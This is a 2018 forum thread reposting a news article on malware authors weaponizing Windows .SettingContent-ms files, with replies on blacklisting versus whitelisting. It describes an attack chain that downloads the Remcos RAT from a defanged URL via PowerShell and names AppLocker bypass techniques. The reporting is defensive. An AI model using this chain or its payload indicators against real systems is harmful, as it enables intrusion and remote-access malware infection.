steven36 Posted July 3, 2018 Share Posted July 3, 2018 Malware authors are frantically trying to weaponize a new infection vector that was revealed at the start of June. The trick relies on using Windows Settings (.SettingContent-ms) shortcut files in order to achieve code execution on Windows 10 PCs. Ever since SpecterOps security researcher Matt Nelson published his research on the matter three weeks ago, malware authors have been playing around with proof-of-concept code in attempts of crafting an exploit that can deploy weaponized malware on a victim's system. More SettingContent-ms exploits detected each day With each passing day, more and more exploits are being uploaded on VirusTotal. FireEye security researcher Nick Carr has been avidly tracking these uploads for the past two weeks and has been documenting new findings in Twitter threads like this, this, this, this, or this. Quote yawn.SettingContent-ms Exploring POCs and attacker usage of a particular method like @enigma0x3's responsibly-disclosed #DeepLink technique is mostly uneventful. We'll try to keep sharing some interesting public samples as the technique trickles downstream. pic.twitter.com/zeKQdtTUpQ — Nick Carr (@ItsReallyNick) July 3, 2018 But while previous uploads have been mostly inept tests [1, 2], in recent days, crooks have also put together the first exploit chain that uses a SettingsContent-ms file to actually download and install an actual malware sample. For example, according to Carr, this SettingContent-ms file will download and run an EXE file that contains the Remcos remote access trojan (RAT). Quote "Quotation_Request_Sheet.SettingContent-ms"#DeepLink @enigma0x3 method 0 static AV detections in VT Uses PowerShell to download & launch hxxps://lanitida[.]net/LAW231.exe as %APPDATA%\Rundll32.exe Uploaded just now (2 min ago): https://t.co/2OC6vzrXyw pic.twitter.com/84oTsnE7dm — Nick Carr (@ItsReallyNick) July 2, 2018 While you could attribute some of these VirusTotal uploads to security researchers playing around with Nelson's PoC, the discovery of a weaponized exploit suggests some malware distributors are serious about their tests and telling about their intentions. Jérôme Segura, a Malwarebytes security researcher who also penned a blog post about the weaponized SettingContent-ms exploit that Carr discovered told Bleeping Computer he also expects this to be integrated into live distribution campaigns. "Its name 'quotation' is very much like a lure we see in malspam," Segura said referring to the VT upload's name of "Quotation_Request_Sheet.SettingContent-ms." Is it OK to publish offensive hacking techniques? But the rise in weaponized SettingContent-ms exploits uploaded on VirusTotal has also sparked discussions in the infosec community about the practice of blogging about offensive hacking tricks, like the Nelson article about the SettingContent-ms technique. You can follow the discussion via this Twitter thread, and see opinions that support keeping such techniques secret, while others argue that "security through obscurity" only helps attackers. One of the most interesting replies in this conversation came from Justin Warner, technical director at cyber-security firm ICEBRG. "A really interesting side effect of releasing the tradecraft is funneling actors to predictable behaviors, that are generally documented and easily studied after release," Warner said. "[A public offensive hacking technique] lures threats to predictable detection points." Quote A really interesting side effect of releasing the tradecraft is funneling actors to predictable behaviors, that are generally documented and easily studied after release. Lures threats to predictable detection points. I know there is risk and other nuance, but somewhat helpful — Justin Warner (@sixdub) July 3, 2018 Source Link to comment Share on other sites More sharing options...
straycat19 Posted July 3, 2018 Share Posted July 3, 2018 Not a threat, none of the available malware samples will run on any of my systems and I have no AV software installed or active. Just good old windows security settings. Link to comment Share on other sites More sharing options...
steven36 Posted July 4, 2018 Author Share Posted July 4, 2018 3 hours ago, straycat19 said: Not a threat, none of the available malware samples will run on any of my systems and I have no AV software installed or active. Just good old windows security settings. Are you blacklisting or are you whitelisting? If you're blacklisting you're going about it the wrong way ..People like you who kept talking about blacklisting AppData; specifically, %AppData%\*.exe and %AppData%\*\*.exe with the the rasomware and now Cryptolocker infections, ruined it for everyone. malware writers are starting to use other locations and/or subfolders in subfolders. . Blacklisting AppData leaves you wide open for new threats and is hard to maintain . Software devs started writing programs anti-rasomware that locked down AppData for noobs so malware writers caught on. Everything you say tips them off to change things around. You're AppData settings is not going help you out in all cases anymore, but once you're cpu goes up real high you will learn the hard way. Sometimes when it comes to things it's better to not say nothing at all . I know because I use to help people activate software after i leaked some work around out to the public it was just a matter of time tell the dev got wind of it and changed things around and Malware writers are the same way they be watching you, because money is at stake ether way. People stop writing virus for fun back in the early 2000s it a business to them . The most safest way now is to only to whitelist you're trusted programs in group policy and if they exploit one of them you're still up shit creek if you have no realtime anti-malware with the signature . they came up with smiple bypass to CryptoLocker GPO blocking in like 2015 also theres another one called Applocker Bypass via Registry Key Manipulation . Link to comment Share on other sites More sharing options...
Archanus Posted July 5, 2018 Share Posted July 5, 2018 On 7/3/2018 at 5:56 PM, steven36 said: The trick relies on using Windows Settings (.SettingContent-ms) shortcut files in order to achieve code execution on Windows 10 PCs. Windows 10, can you be even worse??? Everyday I get more surprised jaja Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.